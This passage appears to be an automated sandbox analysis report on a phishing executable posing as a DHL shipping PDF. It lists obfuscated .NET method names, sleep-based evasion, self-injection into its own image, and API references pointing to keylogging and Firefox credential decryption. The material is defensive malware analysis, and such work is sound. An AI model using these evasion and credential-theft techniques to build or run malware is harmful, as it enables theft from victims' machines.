                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, yiG18QtkgBG0q72fMG.csHigh entropy of concatenated method names: 'xrIaOqC6qj', 'RECadPc6uQ', 'KQyaR0KVG4', 'qqFaXEeVy9', 'KARaT9eRwN', 'e9ERWoEQnU', 'JBRRquaeAj', 'wvFRyWGtno', 'NefRoINMhT', 'kllRBoP378'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, MuxZ4DZLQy9qJCXI4U.csHigh entropy of concatenated method names: 'T5SmrXVfSB', 'AMrmKQSFtk', 'ToString', 'IXHm4DdOdY', 'jGYmdLDfFD', 'fBfmiWEUPX', 'v3nmRv0T0c', 'iJXmaQUKyh', 'kGomXxxKXW', 'tOsmTtyWoF'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, nk1RHsjxXGk2crEfVF.csHigh entropy of concatenated method names: 'EsKXGPyr6m', 'fdUXF2CAUx', 'Y5hXnNpjVK', 'dQlXwH7TtP', 'Td4XgwpCRE', 'TZHXfVdg2x', 'xepXQZHbcG', 'Q4gXY6b6cD', 'bUiXDtX1ir', 'gqvXElWeOQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, IukijGEZYdQjGrCs8a.csHigh entropy of concatenated method names: 'unWRgWvK5S', 'UErRQV91GE', 'tVfihCDovu', 'cWFi1oE44J', 'eM3ie0f3t5', 'qoCi6TpxWB', 'yiai0hP8VA', 'WPpiPPNBl3', 'CkCijUXMu2', 'CJqiJtLvpU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, jyMCAX5bjsK0ZXc3xrI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CMVSNdTnH9', 'toJS2I4Gx2', 'y1WSIk5Kx7', 'jxaSUwWFEX', 'FYZSM7cCwZ', 'jQYS72RMxp', 'WrHSZLHkZB'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.csHigh entropy of concatenated method names: 'NQTVORTIqk', 'hlPV41o3Hv', 'RQ6VdPgZbO', 'bJ0VidnE9I', 'hnrVR7iCnL', 'RppVaQLIZb', 'XVTVXtd8Ly', 'wKMVTjvUMt', 'sdAVlQ2yR3', 'whHVrZOFnV'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, xnApCVIMjrAdI14lEe.csHigh entropy of concatenated method names: 'LuOAYNVVHs', 'xlxADBl0J6', 'OL0AtQ7EN0', 'TLOAxttZHN', 'oBhA14XYjv', 'KsVAeMjED8', 'cL6A0H2A5U', 'w1uAP4U135', 'CxGAJjB2RQ', 'OhdAN7y352'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, eVQ1hw554PPm3rQXRCb.csHigh entropy of concatenated method names: 'h85S8Xvo3Y', 'UoMSz2136K', 'P0nLbbdiTj', 'hmkL5eQgcf', 'MruLp8CpCm', 'AN7LVupXLR', 'sohLCKn59q', 'vAjLOGuoWN', 'Y46L4Y3qHT', 'XnTLdH4msA'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, RMxiovdXSF96pWK4ss.csHigh entropy of concatenated method names: 'Dispose', 'fcv5B45FyA', 'BJwpxEWrFX', 'Feo4tAAH3f', 'K0o58JZ1Z8', 'MeX5zjNqDU', 'ProcessDialogKey', 'oPdpbIE1H5', 'gCRp5EqRqS', 'pOlppGNZtb'
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: \dhl shipping details ref id 446331798008765975594-pdf.exe
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: \dhl shipping details ref id 446331798008765975594-pdf.exeJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara match, File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 11B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 2B50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 2980000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 8C50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 9C50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 9E50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: AE50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 2E30000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 2EE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: 2E30000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599890
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599781
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599671
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599562
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599453
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599343
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599234
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599124
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 599015
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598906
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598796
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598687
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598578
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598468
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598359
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598249
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598140
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 598031
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597921
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597812
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597702
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597593
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597484
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597374
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597253
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 597125
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596973
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596812
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596621
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596464
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596359
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596249
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596140
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 596031
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595921
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595812
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595703
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595593
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595484
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595374
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595265
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595156
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 595046
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594936
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594828
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594718
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594609
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594499
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594390
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Thread delayed: delay time: 594280
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Window / User API: threadDelayed 8362
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Window / User API: threadDelayed 1487
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 4152 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep count: 34 > 30
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 1936 Thread sleep count: 8362 > 30
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 1936 Thread sleep count: 1487 > 30
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599781s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599671s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599343s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599234s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599124s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -599015s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598906s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598796s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598687s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598468s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598359s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598249s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598140s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -598031s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597921s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597812s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597702s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597593s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597484s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597374s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597253s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -597125s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596973s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596812s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596621s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596464s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596359s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596249s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596140s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -596031s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595921s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595812s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595703s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595593s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595484s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595374s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595265s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595156s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -595046s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594936s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594828s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594718s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594609s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594499s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594390s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096 Thread sleep time: -594280s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597702Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597253Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596973Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596621Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596464Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595921Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594280Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4569755427.0000000001087000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll,
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0536C168 LdrInitializeThunk,LdrInitializeThunk,3_2_0536C168
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Memory written: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe base: 400000 value starts with: 4D5A
